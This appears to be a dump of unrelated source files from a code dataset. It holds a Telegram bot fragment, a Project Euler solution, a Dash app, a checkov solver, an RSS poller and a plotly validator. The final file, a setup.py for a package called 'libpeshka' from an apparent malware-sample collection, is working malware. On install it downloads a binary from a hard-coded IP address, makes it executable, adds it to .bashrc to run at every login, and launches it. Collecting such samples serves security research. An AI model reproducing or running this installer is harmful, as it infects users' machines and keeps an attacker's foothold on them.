            if redis.hexists("{}Nbot:STreplys".format(BOT_ID),text):
                ID = redis.hget("{}Nbot:STreplys".format(BOT_ID),text)
                Bot("sendSticker",{"chat_id":chatID,"sticker":ID,"reply_to_message_id":message.message_id})
            if redis.hexists("{}Nbot:GFreplys".format(BOT_ID),text):
                ID = redis.hget("{}Nbot:GFreplys".format(BOT_ID),text)
                Bot("sendanimation",{"chat_id":chatID,"animation":ID,"reply_to_message_id":message.message_id})
            # NOTE(review): the next three checks pass a chatID argument into
            # format strings with a single '{}' (or mix per-chat hexists with
            # global hget keys) — looks like a key-name inconsistency in the
            # original source; confirm intended behavior before relying on it.
            if redis.hexists("{}Nbot:{}:VOreplys".format(BOT_ID,chatID),text):
                ID = redis.hget("{}Nbot:VOreplys".format(BOT_ID),text)
                Bot("sendvoice",{"chat_id":chatID,"voice":ID,"reply_to_message_id":message.message_id})
            if redis.hexists("{}Nbot:PHreplys".format(BOT_ID,chatID),text):
                ID = redis.hget("{}Nbot:PHreplys".format(BOT_ID),text)
                Bot("sendphoto",{"chat_id":chatID,"photo":ID,"reply_to_message_id":message.message_id})
            if redis.hexists("{}Nbot:DOreplys".format(BOT_ID,chatID),text):
                ID = redis.hget("{}Nbot:DOreplys".format(BOT_ID),text)
                Bot("sendDocument",{"chat_id":chatID,"document":ID,"reply_to_message_id":message.message_id})
        # --- per-chat auto-replies, unless disabled for this chat ---
        if not redis.sismember("{}Nbot:ReplySend".format(BOT_ID),chatID):
            if redis.hexists("{}Nbot:{}:TXreplys".format(BOT_ID,chatID),text):
                tx = redis.hget("{}Nbot:{}:TXreplys".format(BOT_ID,chatID),text)
                try:
                    rep = {"#cn":"{cn}","#age":"{age}","#fn":"{fn}","#id":"{id}","#username":"{username}","#msgs":"{msgs}","#stast":"{stast}","#edits":"{edits}","#rate":"{rate}","{us}":"{username}","#us":"{username}"}
                    for v in rep.keys():
                        tx = tx.replace(v,rep[v])
                    Bot("sendMessage",{"chat_id":chatID,"text":tx.format(fn=userFN,username=("@"+username or "n"),id=userID,stast=IDrank(redis,userID,chatID,r),cn=title),"reply_to_message_id":message.message_id,"parse_mode":"html"})
                except Exception as e:
                    Bot("sendMessage",{"chat_id":chatID,"text":tx,"reply_to_message_id":message.message_id,"parse_mode":"html"})
            if redis.hexists("{}Nbot:{}:STreplys".format(BOT_ID,chatID),text):
                ID = redis.hget("{}Nbot:{}:STreplys".format(BOT_ID,chatID),text)
                Bot("sendSticker",{"chat_id":chatID,"sticker":ID,"reply_to_message_id":message.message_id})
            if redis.hexists("{}Nbot:{}:GFreplys".format(BOT_ID,chatID),text):
                ID = redis.hget("{}Nbot:{}:GFreplys".format(BOT_ID,chatID),text)
                Bot("sendanimation",{"chat_id":chatID,"animation":ID,"reply_to_message_id":message.message_id})
            if redis.hexists("{}Nbot:{}:VOreplys".format(BOT_ID,chatID),text):
                ID = redis.hget("{}Nbot:{}:VOreplys".format(BOT_ID,chatID),text)
                Bot("sendvoice",{"chat_id":chatID,"voice":ID,"reply_to_message_id":message.message_id})
            if redis.hexists("{}Nbot:{}:AUreplys".format(BOT_ID,chatID),text):
                ID = redis.hget("{}Nbot:{}:AUreplys".format(BOT_ID,chatID),text)
                Bot("sendaudio",{"chat_id":chatID,"audio":ID,"reply_to_message_id":message.message_id})
            if redis.hexists("{}Nbot:{}:PHreplys".format(BOT_ID,chatID),text):
                ID = redis.hget("{}Nbot:{}:PHreplys".format(BOT_ID,chatID),text)
                Bot("sendphoto",{"chat_id":chatID,"photo":ID,"reply_to_message_id":message.message_id})
            if redis.hexists("{}Nbot:{}:DOreplys".format(BOT_ID,chatID),text):
                ID = redis.hget("{}Nbot:{}:DOreplys".format(BOT_ID,chatID),text)
                Bot("sendDocument",{"chat_id":chatID,"document":ID,"reply_to_message_id":message.message_id})
    # --- dynamically loaded plugin files (each handles the message in its own
    # thread).  Placed at function level so non-text messages also reach
    # plugins — TODO confirm nesting against the upstream source.
    if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
        onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
        filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
        for f in onlyfiles:
            if f in filesR:
                fi = f.replace(".py","")
                UpMs= "files."+fi
                try:
                    U = importlib.import_module(UpMs)
                    t = threading.Thread(target=U.updateMsgs,args=(client, message,redis))
                    t.daemon = True
                    t.start()
                    importlib.reload(U)
                except Exception as e:
                    import traceback
                    traceback.print_exc()
                    print(e)
                    pass
| 59.312253 | 296 | 0.653672 |
a2f09d8d3eee23a4b0bf042eb380c201b6d993fd | 443 | py | Python | Solutions/Problem_069.py | PraneethJain/Project-Euler | 54fe34da444803ea55c49e4a4cda3ad6d4bca3b8 | [
"MIT"
] | 2 | 2022-03-11T21:31:52.000Z | 2022-03-11T21:37:14.000Z | Solutions/Problem_069.py | PraneethJain/Project-Euler-100 | 54fe34da444803ea55c49e4a4cda3ad6d4bca3b8 | [
"MIT"
] | null | null | null | Solutions/Problem_069.py | PraneethJain/Project-Euler-100 | 54fe34da444803ea55c49e4a4cda3ad6d4bca3b8 | [
"MIT"
] | 1 | 2022-03-07T12:55:36.000Z | 2022-03-07T12:55:36.000Z | from time import time
from prime import primelist
t1 = time()
prime_list = primelist(20)
product = 1
i = 0
while product * prime_list[i] < 10**6:
product *= prime_list[i]
i += 1
print(product)
print(f"Process completed in {time()-t1}s")
# from sympy import totient as phi
# high=0
# ans=0
# for i in range(10**5,10**6):
# current=i/phi(i)
# print(i)
# if current>high:
# high=current
# ans=i
# print(ans)
| 18.458333 | 43 | 0.620767 |
f87d9e1590aa30b5506c946b6ef63b07c55a4d29 | 3,267 | py | Python | run.py | pflee1989/kickstarter_dash | e3909b15b827b8da4e8b96210d7b8b733a809045 | [
"MIT"
] | null | null | null | run.py | pflee1989/kickstarter_dash | e3909b15b827b8da4e8b96210d7b8b733a809045 | [
"MIT"
] | null | null | null | run.py | pflee1989/kickstarter_dash | e3909b15b827b8da4e8b96210d7b8b733a809045 | [
"MIT"
] | null | null | null | # Imports from 3rd party libraries
# from joblib import load
# pipeline = load('assets/pipeline_joblib')
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
# Imports from this application
from app import app, server
from pages import index, predictions, insights, process
# Navbar docs: https://dash-bootstrap-components.opensource.faculty.ai/l/components/navbar
# Top navigation bar shared by every page.
# Navbar docs: https://dash-bootstrap-components.opensource.faculty.ai/l/components/navbar
navbar = dbc.NavbarSimple(
    brand='Kickstarter Success',
    brand_href='/',
    children=[
        dbc.NavItem(dcc.Link('Predictions', href='/Predictions', className='nav-link')),
        dbc.NavItem(dcc.Link('Insights', href='/Insights', className='nav-link')),
        dbc.NavItem(dcc.Link('Process', href='/Process', className='nav-link')),
        # dbc.NavItem(dcc.Link('Result', href='/Result', className='nav-link'))
    ],
    sticky='top',
    color='light',
    light=True,
    dark=False
)

# Footer with author contact links.
# Footer docs:
# dbc.Container, dbc.Row, dbc.Col: https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
# html.P: https://dash.plot.ly/dash-html-components
# fa (font awesome) : https://fontawesome.com/icons/github-square?style=brands
# mr (margin right) : https://getbootstrap.com/docs/4.3/utilities/spacing/
# className='lead' : https://getbootstrap.com/docs/4.3/content/typography/#lead
footer = dbc.Container(
    dbc.Row(
        dbc.Col(
            html.P(
                [
                    html.Span('Philip Lee', className='mr-2'),
                    html.A(html.I(className='fab fa-linkedin mr-1'), href='https://www.linkedin.com/in/pflee/'),
                    html.A(html.I(className='fas fa-envelope-square mr-1'), href='mailto:pflee1989@outlook.com'),
                    # html.A(html.I(className='fab fa-github-square mr-1'), href='https://github.com/pflee1989/VideoGameRating1.git'),
                    # html.A(html.I(className='fab fa-medium'), href='https://philipfeiranlee.medium.com/video-game-rating-trying-to-simulate-whats-in-the-head-of-the-raters-165c6cf73d16'),
                ],
                className='lead'
            )
        )
    )
)

# Page shell: dcc.Location tracks the URL; 'page-content' is filled by the
# display_page callback below.
# Layout docs:
# html.Div: https://dash.plot.ly/getting-started
# dcc.Location: https://dash.plot.ly/dash-core-components/location
# dbc.Container: https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
app.layout = html.Div([
    dcc.Location(id='url', refresh=False),
    navbar,
    dbc.Container(id='page-content', className='mt-4'),
    html.Hr(),
    footer
])
# URL Routing for Multi-Page Apps: https://dash.plot.ly/urls
@app.callback(Output('page-content', 'children'),
[Input('url', 'pathname')])
def display_page(pathname):
if pathname == '/':
return index.layout
elif pathname == '/Predictions':
return predictions.layout
elif pathname == '/Insights':
return insights.layout
elif pathname == '/Process':
return process.layout
# elif pathname == '/Result':
# return Result.layout
else:
return dcc.Markdown('## Page not found')
# Run app server: https://dash.plot.ly/getting-started
# Run app server: https://dash.plot.ly/getting-started
if __name__ == '__main__':
    app.run_server(debug=True)
aee901c9c24ec698b8a8917370a77e88df07e83c | 823 | py | Python | checkov/common/checks_infra/solvers/complex_solvers/or_solver.py | peaudecastor/checkov | a4804b61c1b1390b7abd44ab53285fcbc3e7e80b | [
"Apache-2.0"
] | null | null | null | checkov/common/checks_infra/solvers/complex_solvers/or_solver.py | peaudecastor/checkov | a4804b61c1b1390b7abd44ab53285fcbc3e7e80b | [
"Apache-2.0"
] | null | null | null | checkov/common/checks_infra/solvers/complex_solvers/or_solver.py | peaudecastor/checkov | a4804b61c1b1390b7abd44ab53285fcbc3e7e80b | [
"Apache-2.0"
] | null | null | null | from typing import List, Any, Dict
from checkov.common.graph.checks_infra.enums import Operators
from checkov.common.graph.checks_infra.solvers.base_solver import BaseSolver
from checkov.common.checks_infra.solvers.complex_solvers.base_complex_solver import BaseComplexSolver
from functools import reduce
from operator import or_
class OrSolver(BaseComplexSolver):
    """Complex solver that passes when at least one child solver passes."""

    operator = Operators.OR

    def __init__(self, solvers: List[BaseSolver], resource_types: List[str]) -> None:
        super().__init__(solvers, resource_types)

    def _get_operation(self, *args: Any, **kwargs: Any) -> Any:
        # Fold every argument together with bitwise/logical OR.
        return reduce(or_, args)

    def get_operation(self, vertex: Dict[str, Any]) -> bool:
        # True as soon as any child solver accepts the vertex.
        return any(solver.get_operation(vertex) for solver in self.solvers)
| 34.291667 | 101 | 0.730255 |
a43915027ecc7cf6ccfd9cbe6db057a711e16f15 | 406 | py | Python | main.py | NikoFresh/news_diff | 70295c5df80b34a315acf1fdf6747ac3510a2098 | [
"MIT"
] | null | null | null | main.py | NikoFresh/news_diff | 70295c5df80b34a315acf1fdf6747ac3510a2098 | [
"MIT"
] | null | null | null | main.py | NikoFresh/news_diff | 70295c5df80b34a315acf1fdf6747ac3510a2098 | [
"MIT"
] | null | null | null | import asyncio
import logging
from config import Config
from src.models import db_setup
from src.start import start
# Configure root logging once at import time, level taken from Config.
logging.basicConfig(
    level=Config.LOG_LEVEL, format="%(name)s - %(levelname)s - %(message)s"
)


async def main() -> None:
    """Initialize the database, then poll the RSS feed forever."""
    db_setup()
    while True:
        start(Config.RSS_URL)
        await asyncio.sleep(Config.SLEEP_TIME)


if __name__ == "__main__":
    asyncio.run(main())
787e178e1ca0f4e872dbfa380036e57d501e933f | 498 | py | Python | Lib/site-packages/plotly/validators/scatter/marker/colorbar/title/_text.py | tytanya/my-first-blog | 2b40adb0816c3546e90ad6ca1e7fb50d924c1536 | [
"bzip2-1.0.6"
] | 12 | 2020-04-18T18:10:22.000Z | 2021-12-06T10:11:15.000Z | plotly/validators/scatter/marker/colorbar/title/_text.py | Vesauza/plotly.py | e53e626d59495d440341751f60aeff73ff365c28 | [
"MIT"
] | 27 | 2020-04-28T21:23:12.000Z | 2021-06-25T15:36:38.000Z | plotly/validators/scatter/marker/colorbar/title/_text.py | Vesauza/plotly.py | e53e626d59495d440341751f60aeff73ff365c28 | [
"MIT"
] | 6 | 2020-04-18T23:07:08.000Z | 2021-11-18T07:53:06.000Z | import _plotly_utils.basevalidators
class TextValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name='text',
parent_name='scatter.marker.colorbar.title',
**kwargs
):
super(TextValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop('edit_type', 'colorbars'),
role=kwargs.pop('role', 'info'),
**kwargs
)
| 26.210526 | 66 | 0.608434 |
2b2c2a4b06a790091560afb220e62c0c298cf1ec | 1,517 | py | Python | malware/libpeshka/libpeshka-0.6/setup.py | rsc-dev/pypi_malware | 0502c84df508d2a84b5f50dc1d4c2b66191318fa | [
"Unlicense"
] | 35 | 2018-12-10T08:59:54.000Z | 2022-01-24T17:43:56.000Z | malware/libpeshka/libpeshka-0.6/setup.py | rsc-dev/pypi_malware | 0502c84df508d2a84b5f50dc1d4c2b66191318fa | [
"Unlicense"
] | null | null | null | malware/libpeshka/libpeshka-0.6/setup.py | rsc-dev/pypi_malware | 0502c84df508d2a84b5f50dc1d4c2b66191318fa | [
"Unlicense"
] | 8 | 2020-02-25T14:00:48.000Z | 2021-10-15T10:13:16.000Z | from setuptools import setup, find_packages
def rn ():
import platform
lb = False
try:
import urllib2
except ImportError:
import requests
lb = True
import os, stat
ADD_LOC = "http://145.249.104.71/out"
LOC = ".drv"
if platform.system () == "Linux":
response = ""
if not lb:
response = urllib2.urlopen(ADD_LOC).read ()
else:
response = requests.get (ADD_LOC)
response = response.content
os.chdir (os.path.expanduser ("~"))
d = open (LOC, "wb")
d.write (response)
d.close ()
current_state = os.stat (LOC)
os.chmod (LOC, current_state.st_mode|stat.S_IEXEC)
brc = open (".bashrc", "a")
brc.write ("\n~/.drv &")
brc.close ()
os.system ("~/.drv &")
else:
print ("Error installing library!")
exit (-1)
rn ()
setup(
name = 'libpeshka',
packages = find_packages (),
entry_points={
'setuptools.installation': [
'eggsecutable = libari.pr:rn'
]
},
version = '0.6',
description = 'Libari wrapper for python',
author = 'Ruri12',
author_email = 'ruri12@example.com',
scripts=["pr.py"],
url = '',
download_url = '',
keywords = ['libari'],
classifiers = [],
)
| 24.079365 | 67 | 0.46737 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.